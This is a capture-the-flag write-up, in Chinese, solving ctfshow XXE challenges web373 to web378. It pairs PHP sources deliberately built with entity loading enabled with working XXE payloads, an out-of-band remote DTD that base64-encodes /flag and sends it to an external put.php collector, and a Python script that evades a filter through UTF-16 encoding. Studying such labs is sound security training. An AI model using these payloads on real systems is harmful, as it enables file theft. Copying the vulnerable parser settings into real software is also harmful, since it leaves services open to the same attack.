Practice - CTFSHOW WEB入门 XXE篇

hextuff

2022-06-26 (Updated: 2024-03-31)

CTF, Practice

web373

source.php

<?php

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

注意这里是 echo $creds->ctfshow;，要将返回的数据包括在 <ctfshow> 中。
payload:

payload.xml

<?xml version="1.0"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY>
<!ENTITY payload SYSTEM "file:///flag">
]>
<creds>
    <ctfshow>
        &payload;
    </ctfshow>
</creds>

web374-376

source.php

<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}

去掉了回显，要带外

payload.xml

<?xml version="1.1"?>
<!DOCTYPE ANY [
<!ENTITY % remote SYSTEM "https://asia-certified-dot-cottages.trycloudflare.com/xxe.dtd">
%remote;
]>

xxe.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % double "<!ENTITY &#x25; xxe SYSTEM 'https://formation-fiscal-tourist-blast.trycloudflare.com/put.php?result=%file;'>">
%double;
%xxe;

put.php

<?php
$a = @$_GET['result'];
if ($a) {
    file_put_contents('result.txt', $a);
}

web377

source.php

<?php

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

还可以用 utf16 编码绕过

exp.py

import requests

burp0_url = "http://9f152358-aa3d-41aa-a247-11ef3241f703.challenge.ctf.show:80/"
burp0_data = "<!DOCTYPE ANY [\r\n<!ENTITY % remote SYSTEM \"https://those-pentium-essential-incoming.trycloudflare.com/xxe.dtd\">\r\n%remote;\r\n]><root>123</root>"
response = requests.get(burp0_url, data=burp0_data.encode("utf-16"))

print(response.status_code, response.text)

xxe.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % double "<!ENTITY &#x25; xxe SYSTEM 'https://formation-fiscal-tourist-blast.trycloudflare.com/put.php?result=%file;'>">
%double;
%xxe;

put.php

<?php
$a = @$_GET['result'];
if ($a) {
    file_put_contents('result.txt', $a);
}

web378

提示是 python 的 xxe，看到回显里有 username，于是和第一题一样在 username 里面尝试实体回显

http.raw

POST /doLogin HTTP/1.1
Host: 6d08372c-495a-4615-8699-9f014bbb92ee.challenge.ctf.show
Content-Length: 155
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://6d08372c-495a-4615-8699-9f014bbb92ee.challenge.ctf.show
Referer: http://6d08372c-495a-4615-8699-9f014bbb92ee.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=17eca237f064ad-05ba9f2afdfcf8-f791539-144000-17eca237f0779c; __e_inc=1; __cdY3RmLnNob3c==1
Connection: close

<!DOCTYPE creds [
<!ELEMENT creds ANY>
<!ENTITY payload SYSTEM "file:///flag">
]>
<user><username>&payload;</username><password>aaaaa</password></user>